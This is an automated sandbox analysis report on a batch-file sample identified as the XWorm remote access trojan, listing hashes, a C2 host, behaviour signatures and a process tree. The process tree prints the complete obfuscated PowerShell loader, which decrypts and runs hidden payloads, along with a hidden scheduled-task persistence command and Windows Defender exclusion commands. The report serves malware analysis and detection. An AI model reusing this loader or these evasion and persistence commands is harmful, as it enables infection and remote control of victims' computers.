Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 02:23

General

  • Target

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat

  • Size

    94KB

  • MD5

    a5bd53f790ed63251d0f435b17ada13d

  • SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

  • SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

  • SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

  • SSDEEP

    1536:y3UhPdcYkDCDYe694UQ3DvwDnqFDdbYdLRmUpDLHcfVWeIZ9U1mRDLOeBrT:y3K6Yb694VzvweEUUefVmZOwRDLOW

Malware Config

Extracted

Family

xworm

C2

moneyfraud-30212.portmap.host:30212

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    SvcManager.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Local\Temp\348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_732_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_732.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4984
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_732.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_732.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pRmtmB/ugH2fDAdQ1jnbQ+2xlrRevgyzMZYoaNcI2bA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z/EhX1qbRvIc8ksyAuzKnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ildFc=New-Object System.IO.MemoryStream(,$param_var); $BIzdO=New-Object System.IO.MemoryStream; $wvVkJ=New-Object System.IO.Compression.GZipStream($ildFc, [IO.Compression.CompressionMode]::Decompress); $wvVkJ.CopyTo($BIzdO); $wvVkJ.Dispose(); $ildFc.Dispose(); $BIzdO.Dispose(); $BIzdO.ToArray();}function execute_function($param_var,$param2_var){ $hzQGQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MmgRI=$hzQGQ.EntryPoint; $MmgRI.Invoke($null, $param2_var);}$cnMfq = 'C:\Users\Admin\AppData\Roaming\startup_str_732.bat';$host.UI.RawUI.WindowTitle = $cnMfq;$KwfLC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cnMfq).Split([Environment]::NewLine);foreach ($IjgYh in $KwfLC) { if ($IjgYh.StartsWith(':: ')) { $cbUwg=$IjgYh.Substring(3); break; }}$payloads_var=[string[]]$cbUwg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1704
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:440
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3308
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SvcManager.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    dbbf71e9fb59f80938f09809b160e441

    SHA1

    8b9a517d846cb9a0a284f77ed88328236a85055f

    SHA256

    e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

    SHA512

    90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    10890cda4b6eab618e926c4118ab0647

    SHA1

    1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

    SHA256

    00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

    SHA512

    a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    da5c82b0e070047f7377042d08093ff4

    SHA1

    89d05987cd60828cca516c5c40c18935c35e8bd3

    SHA256

    77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

    SHA512

    7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2e3qgsj1.hsb.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_732.bat

    Filesize

    94KB

    MD5

    a5bd53f790ed63251d0f435b17ada13d

    SHA1

    c0ada960a41596819df77f185dfe79b730ade6c8

    SHA256

    348b05201dbe7fd54d844f0e94906a45c899bb0a450c11a2d0e7a385517f0a4e

    SHA512

    fe034f585627253eb436fc7f0b0d831e70acf93351c09e97ddb21f569cd1fc158777738eb24910c66d2a65d560801bb4cfb0835281f711f21e4e8d45e06fcfa0

  • C:\Users\Admin\AppData\Roaming\startup_str_732.vbs

    Filesize

    115B

    MD5

    37663bdd1a21a02d83623e8fa7a34bfa

    SHA1

    b43afb4dec023343a4ecacc666a507ce508efab4

    SHA256

    c53514676782927650368ef6fde0b31ebcfd265afc942a0c190b6a538823ad5c

    SHA512

    30400f6c54d00f9ea8a32b58a2d82fc602365dc45310d67429520e218631b10e720ed46ab95306ea88519c7b1cbaa641a9d6feb78745bdc0453ca8e25e9ad21f

  • memory/2864-48-0x00000233F4E50000-0x00000233F4E68000-memory.dmp

    Filesize

    96KB

  • memory/3880-12-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-14-0x000001F464E60000-0x000001F464E74000-memory.dmp

    Filesize

    80KB

  • memory/3880-13-0x000001F44C8E0000-0x000001F44C8E8000-memory.dmp

    Filesize

    32KB

  • memory/3880-49-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-0-0x00007FF8D8473000-0x00007FF8D8475000-memory.dmp

    Filesize

    8KB

  • memory/3880-11-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-6-0x000001F464E00000-0x000001F464E22000-memory.dmp

    Filesize

    136KB

  • memory/4984-29-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB

  • memory/4984-17-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB

  • memory/4984-16-0x00007FF8D8470000-0x00007FF8D8F31000-memory.dmp

    Filesize

    10.8MB